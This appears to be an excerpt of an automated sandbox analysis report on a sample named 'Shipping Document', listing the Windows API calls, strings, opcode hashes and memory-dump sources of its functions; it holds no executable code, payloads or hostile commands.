                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: 0a5f63327d2465eddcffd203a53d9a1c057f09a1cc79abbe4c196ca81c9e347d
                              • Instruction ID: 105a7c774b4b7a498366bdbadfb5594413ad25c1b1692578232a98344219d1c3
                              • Opcode Fuzzy Hash: 0a5f63327d2465eddcffd203a53d9a1c057f09a1cc79abbe4c196ca81c9e347d
                              • Instruction Fuzzy Hash: 3601D8B26C4109BBF345A6275E42FAF77DCAF12294F444029FD449B247F768DE1182E2
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 01024D5C
                              • __beginthreadex.LIBCMT ref: 01024D7A
                              • MessageBoxW.USER32(?,?,?,?), ref: 01024D8F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 01024DA5
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 01024DAC
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                              • String ID:
                              • API String ID: 3824534824-0
                              • Opcode ID: 4c70bc6909359a4a9e1a26499329bb76844ab268c4ec41b8bd577bfb380cf0b3
                              • Instruction ID: cde8718004b4ec5dede15c02f3de5f29073e141c155bbe66d1b384108756a42c
                              • Opcode Fuzzy Hash: 4c70bc6909359a4a9e1a26499329bb76844ab268c4ec41b8bd577bfb380cf0b3
                              • Instruction Fuzzy Hash: AB1148B6908654BBC7219BACDC44ADE7FECEB45320F144299F994D7241C67A880087A0
                              APIs
                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01018766
                              • GetLastError.KERNEL32(?,0101822A,?,?,?), ref: 01018770
                              • GetProcessHeap.KERNEL32(00000008,?,?,0101822A,?,?,?), ref: 0101877F
                              • HeapAlloc.KERNEL32(00000000,?,0101822A,?,?,?), ref: 01018786
                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101879D
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 842720411-0
                              • Opcode ID: 836962771244ec751f94f338de551ddff6c401da8c17cdfb2fb97b08879c5ab7
                              • Instruction ID: 2e54191a8609b46b0a57ac1ad7ae4110666099a3eaf325f6e1027d39f90f5911
                              • Opcode Fuzzy Hash: 836962771244ec751f94f338de551ddff6c401da8c17cdfb2fb97b08879c5ab7
                              • Instruction Fuzzy Hash: B4016DB5200205BFDB245FBADD88D6B7FACFF8A255710446AF989C3254DA36D910CB60
                              APIs
                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 01025502
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01025510
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 01025518
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 01025522
                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 152eaff66b44b3a3c7d4f9b83fed886350595421e1a9360dca2fa1e7d89e122b
                              • Instruction ID: 5f7ffa095f2bf7c7ab9b9af4aa93416d932bd7c61ac326203c4f39d376ef389b
                              • Opcode Fuzzy Hash: 152eaff66b44b3a3c7d4f9b83fed886350595421e1a9360dca2fa1e7d89e122b
                              • Instruction Fuzzy Hash: 25015B75D0063ADBCF10EFE8ED986EDBBB8BB09711F440086E981F2144DB355550C7A5
                              APIs
                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?,?,0101799D), ref: 0101766F
                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 0101768A
                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 01017698
                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?), ref: 010176A8
                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0101758C,80070057,?,?), ref: 010176B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: From$Prog$FreeStringTasklstrcmpi
                              • String ID:
                              • API String ID: 3897988419-0
                              • Opcode ID: 839eb21d80e7c7c2e8108816e9ebdd5aac26e45f5ef53d926a20ae304b9c4ba5
                              • Instruction ID: add02ab5f85eb72815dd00ab5230874340bc5fc4c57876d06de4861a8ff190d4
                              • Opcode Fuzzy Hash: 839eb21d80e7c7c2e8108816e9ebdd5aac26e45f5ef53d926a20ae304b9c4ba5
                              • Instruction Fuzzy Hash: 7401D4B6600215BBEB204F5CDD44BAA7FECEB48651F100458FE84D7209E73ADD4087A0
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01018608
                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01018612
                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01018621
                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01018628
                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101863E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: c3dfc44b8b9bcfe44fabf1363e2099b3dd22bd651c1f0b8eb44abfd9f231c494
                              • Instruction ID: 2d902fd6c6d9e3c6065a5b5f360881ee9dd2d26e16cdf2ed2b2dab050d9e25f0
                              • Opcode Fuzzy Hash: c3dfc44b8b9bcfe44fabf1363e2099b3dd22bd651c1f0b8eb44abfd9f231c494
                              • Instruction Fuzzy Hash: 89F0C274200205AFEB211FACDDCDE6B3FECEF8A654B004416F985C2144CB7A9841DB60
                              APIs
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01018669
                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01018673
                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01018682
                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01018689
                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101869F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: HeapInformationToken$AllocErrorLastProcess
                              • String ID:
                              • API String ID: 44706859-0
                              • Opcode ID: 83c8a4195c52cbc4219a1437379f22a30da04584553153869cbb5558aef0cc81
                              • Instruction ID: 37cafa33ecd0e9b2cf7e5929c6106e780d43075ec18cba96de8a2df1e087739a
                              • Opcode Fuzzy Hash: 83c8a4195c52cbc4219a1437379f22a30da04584553153869cbb5558aef0cc81
                              • Instruction Fuzzy Hash: 3DF0AFB8200205AFEB211FA8ECC8E673FECEF8A654B100416F985D3144CA6A9900DB60
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 0101C6BA
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0101C6D1
                              • MessageBeep.USER32(00000000), ref: 0101C6E9
                              • KillTimer.USER32(?,0000040A), ref: 0101C705
                              • EndDialog.USER32(?,00000001), ref: 0101C71F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 2cd56716015c8835c56a4ac54069eb42b5872eb319d6c27efd2667ff021f458d
                              • Instruction ID: a2a7017dde3e599d4010475c06071e0801866a0f917274196292a7f198dc57cf
                              • Opcode Fuzzy Hash: 2cd56716015c8835c56a4ac54069eb42b5872eb319d6c27efd2667ff021f458d
                              • Instruction Fuzzy Hash: CE0184744403059BFB315B28EE8EF967BB8BB04701F00055DB6C2A14D5DBE9A9548B40
                              APIs
                              • EndPath.GDI32(?), ref: 00FC13BF
                              • StrokeAndFillPath.GDI32(?,?,00FFBAD8,00000000,?), ref: 00FC13DB
                              • SelectObject.GDI32(?,00000000), ref: 00FC13EE
                              • DeleteObject.GDI32 ref: 00FC1401
                              • StrokePath.GDI32(?), ref: 00FC141C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: 074c43ccbdacd7533ee2dd18179fbc750fad4789cd7adc404a931943a2365642
                              • Instruction ID: 87fcf251aebb0c5b770dc831b0d7e01da6fda73d6f06ef1569dc3325bf897e8f
                              • Opcode Fuzzy Hash: 074c43ccbdacd7533ee2dd18179fbc750fad4789cd7adc404a931943a2365642
                              • Instruction Fuzzy Hash: B6F06DB001824ADBDB354F1AEA4DB583BA4BB12326F148318F4E9440E9C33B44A1DF10
                              APIs
                                • Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
                                • Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                                • Part of subcall function 00FC7BB1: _memmove.LIBCMT ref: 00FC7C0B
                              • __swprintf.LIBCMT ref: 00FD302D
                              Strings
                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FD2EC6
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                              • API String ID: 1943609520-557222456
                              • Opcode ID: 5e32bc905b0ec3d8e123281b7c8592c0e3bf05346aa83f0403d063ac7cd6e5d9
                              • Instruction ID: 742775c3b814423c10435a5aa599de400b6bc14e6fb83201a3450bdb8db0915b
                              • Opcode Fuzzy Hash: 5e32bc905b0ec3d8e123281b7c8592c0e3bf05346aa83f0403d063ac7cd6e5d9
                              • Instruction Fuzzy Hash: 5F91AD311083029FD718EF24CD8AD6EB7E5EF85710F44091EF5829B2A1DA75EE44EB52
                              APIs
                                • Part of subcall function 00FC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FC48A1,?,?,00FC37C0,?), ref: 00FC48CE
                              • CoInitialize.OLE32(00000000), ref: 0102BC26
                              • CoCreateInstance.OLE32(01052D6C,00000000,00000001,01052BDC,?), ref: 0102BC3F
                              • CoUninitialize.OLE32 ref: 0102BC5C
                                • Part of subcall function 00FC9997: __itow.LIBCMT ref: 00FC99C2
                                • Part of subcall function 00FC9997: __swprintf.LIBCMT ref: 00FC9A0C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                              • String ID: .lnk
                              • API String ID: 2126378814-24824748
                              • Opcode ID: adc63f5b52937f71221e8bda5c9e224d4b19c45c57bfd46ea213e0e4f8369d91
                              • Instruction ID: 0580efa5a4c143113801fba1d5ed9c7c212355da90d1b7f56c0e5bf1cba1d676
                              • Opcode Fuzzy Hash: adc63f5b52937f71221e8bda5c9e224d4b19c45c57bfd46ea213e0e4f8369d91
                              • Instruction Fuzzy Hash: FAA143752043129FCB00DF18C985E6ABBE5FF88714F14898CF8999B261CB35ED45CB92
                              APIs
                              • __startOneArgErrorHandling.LIBCMT ref: 00FE52DD
                                • Part of subcall function 00FF0340: __87except.LIBCMT ref: 00FF037B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorHandling__87except__start
                              • String ID: pow
                              • API String ID: 2905807303-2276729525
                              • Opcode ID: 5b35b51a5797108f38b2e8186dfcf873787688cedeb0239a9027b829037d5f72
                              • Instruction ID: 6fc721b7d2ecc9dbcc453789b9c9abc61962f2b30455635a6f7252886e7f4a25
                              • Opcode Fuzzy Hash: 5b35b51a5797108f38b2e8186dfcf873787688cedeb0239a9027b829037d5f72
                              • Instruction Fuzzy Hash: ED51AE71E0974987CB21B625C94137E3B91AF00B64F608D59E2D5812FBEF798CC4BB42
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$+
                              • API String ID: 0-2552117581
                              • Opcode ID: 1fa53b6d83c90de95afe9ba299ebbab4de19ce78cc8822c76195034f00eb1dc5
                              • Instruction ID: 326957e0d48567a1cefc2738dad0ceb5de05aa518c2f342b54327874a8e8c871
                              • Opcode Fuzzy Hash: 1fa53b6d83c90de95afe9ba299ebbab4de19ce78cc8822c76195034f00eb1dc5
                              • Instruction Fuzzy Hash: D35135355042468FDF21AF2DCC89AF97BE4EF9A310F540095E8D19F2A4DB789883DB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memset$_memmove
                              • String ID: ERCP
                              • API String ID: 2532777613-1384759551
                              • Opcode ID: 1d255c593922b31f3e7168a1ea724972d16fa2f30d6e17e416e8adb6aed9d786
                              • Instruction ID: 4c2cc0963172324395f2bb7926a1ebb1a69df40541eeaed5ce68c4106723080d
                              • Opcode Fuzzy Hash: 1d255c593922b31f3e7168a1ea724972d16fa2f30d6e17e416e8adb6aed9d786
                              • Instruction Fuzzy Hash: ED51A171D003099BDB28DF65C8857AABBF5EF04324F14856FE98ACB341E7759684CB40
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0104F910,00000000,?,?,?,?), ref: 01047C4E
                              • GetWindowLongW.USER32 ref: 01047C6B
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01047C7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 29ac4ec83214688fc33a79149d7f8a57d9d5afbddcbe2a262217007649a632a3
                              • Instruction ID: 0a047407d9908d435803ed3b2a7cb92f554ba4356b5321c7ec5784269623e1c5
                              • Opcode Fuzzy Hash: 29ac4ec83214688fc33a79149d7f8a57d9d5afbddcbe2a262217007649a632a3
                              • Instruction Fuzzy Hash: 4031E37120020AAFDB619E38DC85BEA7BA9FF45324F204729F9B5931D1D735E8509B90
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010476D0
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010476E4
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 01047708
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: fbb3f1c1420c1d1203fb0f329ba79a2f958d658692e9447c2c007d7aaff0b3b5
                              • Instruction ID: 6204c10f4b744c40664e4a39f011044d4da4074708cc3d60d42d802800cf51b6
                              • Opcode Fuzzy Hash: fbb3f1c1420c1d1203fb0f329ba79a2f958d658692e9447c2c007d7aaff0b3b5
                              • Instruction Fuzzy Hash: 0D21B472500219ABDF22CE54CC86FEA3BA5FB4C754F110254FE956B1D1D7B5A8508B90
                              APIs
                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01046FAA
                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01046FBA
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01046FDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: MessageSend$MoveWindow
                              • String ID: Listbox
                              • API String ID: 3315199576-2633736733
                              • Opcode ID: b5305ac9391f502bc8c3e2bd6e813e83b44438bf4a114aa6d21ae8e433c54f8d
                              • Instruction ID: 257dff18516ef531703a7922ae140b5d07be28320a0538b58dfb18be01008918
                              • Opcode Fuzzy Hash: b5305ac9391f502bc8c3e2bd6e813e83b44438bf4a114aa6d21ae8e433c54f8d
                              • Instruction Fuzzy Hash: 9B21C572610118BFEF128F58CCC5FAB37AAFF8A750F418164F9859B191DA729C51C7A0
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010479E1
                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010479F6
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01047A03
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
